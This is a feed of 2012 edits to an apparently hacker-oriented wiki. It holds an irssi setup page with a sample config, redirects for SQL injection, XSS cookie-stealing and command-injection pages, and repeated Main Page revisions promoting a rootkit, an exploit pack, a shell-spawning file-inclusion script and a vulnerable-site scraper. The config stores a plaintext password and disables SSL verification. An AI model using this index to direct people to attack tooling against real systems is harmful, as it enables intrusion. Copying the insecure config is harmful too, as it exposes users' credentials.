<pre>emerge irssi</pre><br />
<br />
===Slackware===<br />
<pre>slackware-current</pre><br />
<br />
===Frugalware===<br />
<pre>pacman -S irssi</pre><br />
<br />
===Solaris===<br />
<pre>pkg-get install irssi</pre><br />
<br />
===Arch Linux===<br />
<pre>pacman -S irssi</pre><br />
<br />
==Connecting to the IRC==<br />
<br />
<pre>irssi<br />
/connect -ssl irc.blackhatacademy.org<br />
/join #CSIII</pre><br />
<br />
== Sample config file ==<br />
<pre><br />
servers = (<br />
{<br />
address = "irc.blackhatacademy.org";<br />
chatnet = "bha";<br />
port = "6697";<br />
autoconnect = "yes";<br />
use_ssl = "yes";<br />
ssl_verify = "no";<br />
}<br />
}<br />
<br />
chatnets = {<br />
bha = {<br />
type = "IRC";<br />
nick = "Savitri";<br />
user = "arya";<br />
realname = "Llama Llama Duck";<br />
autosendcmd = "SBCONNECT";<br />
};<br />
}<br />
<br />
channels = {<br />
{ name = "#school"; chatnet = "bha"; autojoin = "Yes"; },<br />
{ name = "#wiki"; chatnet = "bha"; autojoin = "Yes"; }<br />
}<br />
<br />
aliases = {<br />
J = "join";<br />
WJOIN = "join -window";<br />
WQUERY = "query -window";<br />
LEAVE = "part";<br />
BYE = "quit";<br />
EXIT = "quit";<br />
SIGNOFF = "quit";<br />
DESCRIBE = "action";<br />
DATE = "time";<br />
HOST = "userhost";<br />
LAST = "lastlog";<br />
SAY = "msg *";<br />
WI = "whois";<br />
WII = "whois $0 $0";<br />
WW = "whowas";<br />
W = "who";<br />
N = "names";<br />
M = "msg";<br />
T = "topic";<br />
C = "clear";<br />
CL = "clear";<br />
K = "kick";<br />
KB = "kickban";<br />
KN = "knockout";<br />
BANS = "ban";<br />
B = "ban";<br />
MUB = "unban *";<br />
UB = "unban";<br />
IG = "ignore";<br />
UNIG = "unignore";<br />
SB = "scrollback";<br />
UMODE = "mode $N";<br />
WC = "window close";<br />
WN = "window new hide";<br />
SV = "say Irssi $J ($V) - http://irssi.org/";<br />
GOTO = "sb goto";<br />
CHAT = "dcc chat";<br />
RUN = "SCRIPT LOAD";<br />
SBAR = "STATUSBAR";<br />
INVITELIST = "mode $C +I";<br />
SBCONNECT = "MSG starburst USER IDENTIFY Savitri ohnoesmypassw0rdz";<br />
}<br />
<br />
<br />
</pre><br />
<br />
==References==<br />
*[http://irssi.org/download Irssi download page]<br />
*[http://scripts.irssi.org/ Useful Irssi scripts]<br />
<br />
[[Category:Software]][[Category:Administration]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Union_select_injection&diff=7488Union select injection2012-06-16T01:52:20Z<p>DPYJulietowbaijc: </p>
<hr />
<div>#REDIRECT [[SQL injection#Basic Injection : Union Select]]<br />
[[Category:Indexing]]<br />
[[Category:Web exploitation]]<br />
[[Category:Exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Sql_injection_test_cheat_sheet&diff=7487Sql injection test cheat sheet2012-06-16T01:51:08Z<p>DPYJulietowbaijc: </p>
<hr />
<div>#REDIRECT [[SQL injection#Vulnerability testing]]<br />
[[Category:Indexing]][[Category:Web exploitation]]<br />
[[Category:Exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Sql_injection_time_based_byte_extraction&diff=7486Sql injection time based byte extraction2012-06-16T01:50:55Z<p>DPYJulietowbaijc: </p>
<hr />
<div>#REDIRECT [[SQL injection#Timing-based single-byte exfiltration]]<br />
[[Category:Indexing]][[Category:Web exploitation]]<br />
[[Category:Exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Sql_injection_timing_attack_with_boolean_enumeration&diff=7485Sql injection timing attack with boolean enumeration2012-06-16T01:50:42Z<p>DPYJulietowbaijc: </p>
<hr />
<div>#REDIRECT [[SQL injection#Expert:_Timing_attacks_for_automated_boolean_enumeration]]<br />
[[Category:Indexing]][[Category:Web exploitation]]<br />
[[Category:Exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Sql_injection_with_regular_expressions&diff=7484Sql injection with regular expressions2012-06-16T01:50:29Z<p>DPYJulietowbaijc: </p>
<hr />
<div>#REDIRECT [[SQL injection#Using Regular Expressions for Boolean enumeration]]<br />
[[Category:Indexing]][[Category:Web exploitation]]<br />
[[Category:Exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Sql_injection_without_commas&diff=7483Sql injection without commas2012-06-16T01:49:59Z<p>DPYJulietowbaijc: </p>
<hr />
<div>#REDIRECT [[SQL injection#Testing with Regular Expression Operators (REGEXP, ~, and RLIKE)]]<br />
[[Category:Indexing]]<br />
[[Category:Web exploitation]]<br />
[[Category:Exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Sql_injection_without_quotes&diff=7482Sql injection without quotes2012-06-16T01:49:46Z<p>DPYJulietowbaijc: </p>
<hr />
<div>#REDIRECT [[SQL injection#Quotes]]<br />
[[Category:Indexing]]<br />
[[Category:Web exploitation]]<br />
[[Category:Exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Sql_injection_without_whitespace&diff=7481Sql injection without whitespace2012-06-16T01:49:31Z<p>DPYJulietowbaijc: </p>
<hr />
<div>#REDIRECT [[SQL injection#Whitespace filtering]]<br />
[[Category:Indexing]][[Category:Web exploitation]]<br />
[[Category:Exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Sql_injection_without_tags&diff=7480Sql injection without tags2012-06-16T01:48:48Z<p>DPYJulietowbaijc: </p>
<hr />
<div>#REDIRECT [[SQL injection#Testing with BETWEEN]]<br />
[[Category:Indexing]][[Category:Web exploitation]]<br />
[[Category:Exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Steal_cookies&diff=7479Steal cookies2012-06-16T01:48:34Z<p>DPYJulietowbaijc: </p>
<hr />
<div>#REDIRECT [[Cookies#Stealing_cookies_through_XSS]]<br />
[[Category:Indexing]][[Category:Web exploitation]][[Category:Programming]]<br />
[[Category:Exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Sqli&diff=7478Sqli2012-06-16T01:48:23Z<p>DPYJulietowbaijc: </p>
<hr />
<div>#REDIRECT [[SQL injection]]<br />
[[Category:Indexing]]<br />
[[Category:Web exploitation]]<br />
[[Category:Exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Stealing_cookies_through_xss&diff=7477Stealing cookies through xss2012-06-16T01:48:11Z<p>DPYJulietowbaijc: </p>
<hr />
<div>#REDIRECT [[Cookies#Stealing_cookies_through_XSS]]<br />
[[Category:Indexing]]<br />
[[Category:Web exploitation]]<br />
[[Category:Exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Test_for_command_injection&diff=7476Test for command injection2012-06-16T01:47:59Z<p>DPYJulietowbaijc: </p>
<hr />
<div>#REDIRECT [[Command Injection#Testing for Injection]]<br />
[[Category:Indexing]]<br />
[[Category:Web exploitation]]<br />
[[Category:Exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Test_for_xss&diff=7475Test for xss2012-06-16T01:47:43Z<p>DPYJulietowbaijc: </p>
<hr />
<div>#REDIRECT [[XSS#Testing for XSS]]<br />
[[Category:Indexing]]<br />
[[Category:Web exploitation]]<br />
[[Category:Exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Main_Page&diff=7474Main Page2012-06-16T01:28:27Z<p>DPYJulietowbaijc: </p>
<hr />
<div>{{info|<center>'''Get involved''' by signing up for and contributing to this wiki, joining [[IRC]] or subscribing to [http://reddit.blackhatacademy.org /r/blackhat]! <br />Brought to you by [http://blackhatacademy.org Blackhat Academy]</center>}}<br />
<br />
<br />
{{social}}<br />
<br />
<table width="100%"><br />
<tr style="vertical-align:top"><br />
<td width="50%"><br />
<table style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"><tr><td><br />
<br />
<big><big><center>'''Featured Article'''</center></big></big><br />
<br />
----<br />
<br />
{{:Main Page/Featured Article}}</td></tr></table><br />
</td><br />
<td width="50%"><br />
<table style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"><tr><td><br />
<br />
<big><big><center>'''Featured Tool'''</center></big></big><br />
<br />
----<br />
<br />
{{:Main Page/Featured Tool}}</td></tr></table><br />
</td><br />
</tr><br />
</table><br />
<br />
<br />
<center><table style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"><tr><td><br />
<center><big>'''Articles'''</big><br />
<br />
----<br />
<br />
'''Exploitation:'''<br />
<br />
[[Buffer overflow|Stack overflows]] &bull; [[SQL injection]] &bull; [[XSS]] &bull; [[Cookies]] &bull; [[File inclusion]] &bull; [[Command Injection|Command injection]] &bull; [[XSCF]] &bull; [[Cold Fusion Hacking|Coldfusion hacking]] &bull; [[Web Exploitation|Web exploitation]]<br />
<br />
'''Programming:'''<br />
<br />
[[Ascii shellcode]] &bull; [[C]] &bull; [[CPP|C++]] &bull; [[Perl]] &bull; [[Python]] &bull; [[LUA]] &bull; [[Polymorphic]] &bull; [[Bash book|The bash book]] &bull; [[SQL Backdoors]]<br />
<br />
<br />
<small>([[:Category:Indexing|The index]])</small></center></td></tr></table></center><br />
<br />
<br />
<br />
{|style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"<br />
!colspan="6" align="center"|<big>'''Tools</big><br />
|-<br />
|valign="top"|'''[[Vanguard]]'''<br />
|valign="top"|''[[Web Exploitation|web application vulnerability]] testing engine written in [[perl]] with LibWhisker2 support''<br />
|<br />
|valign="top"|'''[[Jynx2]]'''<br />
|valign="top"|''Version 2.0 of the classic [[LD_Preload]] userland rootkit written in [[C]]''<br />
|-<br />
|valign="top"|'''[[Bleeding Life]]'''<br />
|valign="top"|''[[PHP]] and [[MySQL]] based browser [[buffer overflow]] exploit pack''<br />
|<br />
|valign="top"|'''[[Kolkata]]'''<br />
|valign="top"|''Configurable [[perl]] scanner that analyzes [[cryptography|checksums]] to perform fingerprinting on web applications with static file analysis''<br />
|-<br />
|valign="top"|'''[[GScrape]]'''<br />
|valign="top"|''Google scraper written [[perl]] for rapidly identifying vulnerable websites and generating statistics''<br />
|<br />
|valign="top"|'''[[Lfi_autopwn.pl]]'''<br />
|valign="top"|''Given a [[File inclusion|file inclusion]] vulnerability, this [[Perl]] script will spawn a shell''<br />
|-<br />
|valign="top"|'''[[MySql 5 Enumeration|Mysql5 enumerator]]'''<br />
|valign="top"|''Automatically map contents or query a remote database given a URL vulnerable to [[SQL injection]] with this [[perl]] script''<br />
|<br />
|valign="top"|'''[http://chokepoint.net/?id=5 Social Network Redirection Utility]'''<br />
|valign="top"|''Rickroll your friends with [[XSCF|content-forged]] image redirects''<br />
<br />
|}</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Main_Page&diff=7473Main Page2012-06-16T01:27:00Z<p>DPYJulietowbaijc: </p>
<hr />
<div>{{info|<center>'''Get involved''' by signing up for and contributing to this wiki, joining [[IRC]] or subscribing to [http://reddit.blackhatacademy.org /r/blackhat]! <br />Brought to you by [http://blackhatacademy.org Blackhat Academy]</center>}}<br />
<br />
<br />
{{social}}<br />
<br />
<table width="100%"><br />
<tr style="vertical-align:top"><br />
<td width="50%"><br />
<table style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"><tr><td><br />
<br />
<big><big><center>'''Featured Article'''</center></big></big><br />
<br />
----<br />
<br />
{{:Main Page/Featured Article}}</td></tr></table><br />
</td><br />
<td width="50%"><br />
<table style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"><tr><td><br />
<br />
<big><big><center>'''Featured Tool'''</center></big></big><br />
<br />
----<br />
<br />
{{:Main Page/Featured Tool}}</td></tr></table><br />
</td><br />
</tr><br />
</table><br />
<br />
<br />
<center><table style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"><tr><td><br />
<center><big>'''Articles'''</big><br />
<br />
----<br />
<br />
'''Exploitation:'''<br />
<br />
[[Buffer overflow|Stack overflows]] &bull; [[SQL injection]] &bull; [[XSS]] &bull; [[Cookies]] &bull; [[File inclusion]] &bull; [[Command Injection|Command injection]] &bull; [[XSCF]] &bull; [[Cold Fusion Hacking|Coldfusion hacking]] &bull; [[Web Exploitation|Web exploitation]]<br />
<br />
'''Programming:'''<br />
<br />
[[Ascii shellcode]] &bull; [[C]] &bull; [[CPP|C++]] &bull; [[Perl]] &bull; [[Python]] &bull; [[LUA]] &bull; [[Polymorphic]] &bull; [[Bash book|The bash book]] &bull; [[SQL Backdoors]]<br />
<br />
<br />
<small>([[Special:AllPages|All Pages]])</small></center></td></tr></table></center><br />
<br />
<br />
<br />
{|style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"<br />
!colspan="6" align="center"|<big>'''Tools</big><br />
|-<br />
|valign="top"|'''[[Vanguard]]'''<br />
|valign="top"|''[[Web Exploitation|web application vulnerability]] testing engine written in [[perl]] with LibWhisker2 support''<br />
|<br />
|valign="top"|'''[[Jynx2]]'''<br />
|valign="top"|''Version 2.0 of the classic [[LD_Preload]] userland rootkit written in [[C]]''<br />
|-<br />
|valign="top"|'''[[Bleeding Life]]'''<br />
|valign="top"|''[[PHP]] and [[MySQL]] based browser [[buffer overflow]] exploit pack''<br />
|<br />
|valign="top"|'''[[Kolkata]]'''<br />
|valign="top"|''Configurable [[perl]] scanner that analyzes [[cryptography|checksums]] to perform fingerprinting on web applications with static file analysis''<br />
|-<br />
|valign="top"|'''[[GScrape]]'''<br />
|valign="top"|''Google scraper written [[perl]] for rapidly identifying vulnerable websites and generating statistics''<br />
|<br />
|valign="top"|'''[[Lfi_autopwn.pl]]'''<br />
|valign="top"|''Given a [[File inclusion|file inclusion]] vulnerability, this [[Perl]] script will spawn a shell''<br />
|-<br />
|valign="top"|'''[[MySql 5 Enumeration|Mysql5 enumerator]]'''<br />
|valign="top"|''Automatically map contents or query a remote database given a URL vulnerable to [[SQL injection]] with this [[perl]] script''<br />
|<br />
|valign="top"|'''[http://chokepoint.net/?id=5 Social Network Redirection Utility]'''<br />
|valign="top"|''Rickroll your friends with [[XSCF|content-forged]] image redirects''<br />
<br />
|}</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Main_Page&diff=7472Main Page2012-06-16T01:26:15Z<p>DPYJulietowbaijc: </p>
<hr />
<div>{{info|<center>'''Get involved''' by signing up for and contributing to this wiki, joining [[IRC]] or subscribing to [http://reddit.blackhatacademy.org /r/blackhat]! <br />Brought to you by [http://blackhatacademy.org Blackhat Academy]</center>}}<br />
<br />
<br />
{{social}}<br />
<br />
<table width="100%"><br />
<tr style="vertical-align:top"><br />
<td width="50%"><br />
<table style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"><tr><td><br />
<br />
<big><big><center>'''Featured Article'''</center></big></big><br />
<br />
----<br />
<br />
{{:Main Page/Featured Article}}</td></tr></table><br />
</td><br />
<td width="50%"><br />
<table style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"><tr><td><br />
<br />
<big><big><center>'''Featured Tool'''</center></big></big><br />
<br />
----<br />
<br />
{{:Main Page/Featured Tool}}</td></tr></table><br />
</td><br />
</tr><br />
</table><br />
<br />
<br />
<center><table style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"><tr><td><br />
<center><big>'''Articles'''</big><br />
<br />
----<br />
<br />
'''Exploitation:'''<br />
<br />
[[Buffer overflow|Stack overflows]] &bull; [[SQL injection]] &bull; [[XSS]] &bull; [[Cookies]] &bull; [[File inclusion]] &bull; [[Command Injection|Command injection]] &bull; [[XSCF]] &bull; [[Cold Fusion Hacking|Coldfusion hacking]] &bull; [[Web Exploitation|Web exploitation]]<br />
<br />
'''Programming:'''<br />
<br />
[[Ascii shellcode]] &bull; [[C]] &bull; [[CPP|C++]] &bull; [[Perl]] &bull; [[Python]] &bull; [[LUA]] &bull; [[Polymorphic]] &bull; [[Bash book|The bash book]] &bull; [[SQL Backdoors]]<br />
<br />
<br />
<small>([[Category:Indexing|The index]])</small></center></td></tr></table></center><br />
<br />
<br />
<br />
{|style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"<br />
!colspan="6" align="center"|<big>'''Tools</big><br />
|-<br />
|valign="top"|'''[[Vanguard]]'''<br />
|valign="top"|''[[Web Exploitation|web application vulnerability]] testing engine written in [[perl]] with LibWhisker2 support''<br />
|<br />
|valign="top"|'''[[Jynx2]]'''<br />
|valign="top"|''Version 2.0 of the classic [[LD_Preload]] userland rootkit written in [[C]]''<br />
|-<br />
|valign="top"|'''[[Bleeding Life]]'''<br />
|valign="top"|''[[PHP]] and [[MySQL]] based browser [[buffer overflow]] exploit pack''<br />
|<br />
|valign="top"|'''[[Kolkata]]'''<br />
|valign="top"|''Configurable [[perl]] scanner that analyzes [[cryptography|checksums]] to perform fingerprinting on web applications with static file analysis''<br />
|-<br />
|valign="top"|'''[[GScrape]]'''<br />
|valign="top"|''Google scraper written [[perl]] for rapidly identifying vulnerable websites and generating statistics''<br />
|<br />
|valign="top"|'''[[Lfi_autopwn.pl]]'''<br />
|valign="top"|''Given a [[File inclusion|file inclusion]] vulnerability, this [[Perl]] script will spawn a shell''<br />
|-<br />
|valign="top"|'''[[MySql 5 Enumeration|Mysql5 enumerator]]'''<br />
|valign="top"|''Automatically map contents or query a remote database given a URL vulnerable to [[SQL injection]] with this [[perl]] script''<br />
|<br />
|valign="top"|'''[http://chokepoint.net/?id=5 Social Network Redirection Utility]'''<br />
|valign="top"|''Rickroll your friends with [[XSCF|content-forged]] image redirects''<br />
<br />
|}</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Main_Page&diff=7471Main Page2012-06-16T01:23:06Z<p>DPYJulietowbaijc: </p>
<hr />
<div>{{info|<center>'''Get involved''' by signing up for and contributing to this wiki, joining [[IRC]] or subscribing to [http://reddit.blackhatacademy.org /r/blackhat]! <br />Brought to you by [http://blackhatacademy.org Blackhat Academy]</center>}}<br />
<br />
<br />
{{social}}<br />
<br />
<table width="100%"><br />
<tr style="vertical-align:top"><br />
<td width="50%"><br />
<table style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"><tr><td><br />
<br />
<big><big><center>'''Featured Article'''</center></big></big><br />
<br />
----<br />
<br />
{{:Main Page/Featured Article}}</td></tr></table><br />
</td><br />
<td width="50%"><br />
<table style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"><tr><td><br />
<br />
<big><big><center>'''Featured Tool'''</center></big></big><br />
<br />
----<br />
<br />
{{:Main Page/Featured Tool}}</td></tr></table><br />
</td><br />
</tr><br />
</table><br />
<br />
<br />
<center><table style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"><tr><td><br />
<center><big>'''Articles'''</big><br />
<br />
----<br />
<br />
'''Exploitation:'''<br />
<br />
[[Buffer overflow|Stack overflows]] &bull; [[SQL injection]] &bull; [[XSS]] &bull; [[Cookies]] &bull; [[File inclusion]] &bull; [[Command Injection|Command injection]] &bull; [[XSCF]] &bull; [[Cold Fusion Hacking|Coldfusion hacking]] &bull; [[Web Exploitation|Web exploitation]]<br />
<br />
'''Programming:'''<br />
<br />
[[Ascii shellcode]] &bull; [[C]] &bull; [[CPP|C++]] &bull; [[Perl]] &bull; [[Python]] &bull; [[LUA]] &bull; [[Polymorphic]] &bull; [[Bash book|The bash book]] &bull; [[SQL Backdoors]]<br />
<br />
<br />
<small>([[Special:AllPages|All Pages]])</small></center></td></tr></table></center><br />
<br />
<br />
<br />
{|style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"<br />
!colspan="6" align="center"|<big>'''Tools</big><br />
|-<br />
|valign="top"|'''[[Vanguard]]'''<br />
|valign="top"|''[[Web Exploitation|web application vulnerability]] testing engine written in [[perl]] with LibWhisker2 support''<br />
|<br />
|valign="top"|'''[[Jynx2]]'''<br />
|valign="top"|''Version 2.0 of the classic [[LD_Preload]] userland rootkit written in [[C]]''<br />
|-<br />
|valign="top"|'''[[Bleeding Life]]'''<br />
|valign="top"|''[[PHP]] and [[MySQL]] based browser [[buffer overflow]] exploit pack''<br />
|<br />
|valign="top"|'''[[Kolkata]]'''<br />
|valign="top"|''Configurable [[perl]] scanner that analyzes [[cryptography|checksums]] to perform fingerprinting on web applications with static file analysis''<br />
|-<br />
|valign="top"|'''[[GScrape]]'''<br />
|valign="top"|''Google scraper written [[perl]] for rapidly identifying vulnerable websites and generating statistics''<br />
|<br />
|valign="top"|'''[[Lfi_autopwn.pl]]'''<br />
|valign="top"|''Given a [[File inclusion|file inclusion]] vulnerability, this [[Perl]] script will spawn a shell''<br />
|-<br />
|valign="top"|'''[[MySql 5 Enumeration|Mysql5 enumerator]]'''<br />
|valign="top"|''Automatically map contents or query a remote database given a URL vulnerable to [[SQL injection]] with this [[perl]] script''<br />
|<br />
|valign="top"|'''[http://chokepoint.net/?id=5 Social Network Redirection Utility]'''<br />
|valign="top"|''Rickroll your friends with [[XSCF|content-forged]] image redirects''<br />
<br />
|}</div>DPYJulietowbaijc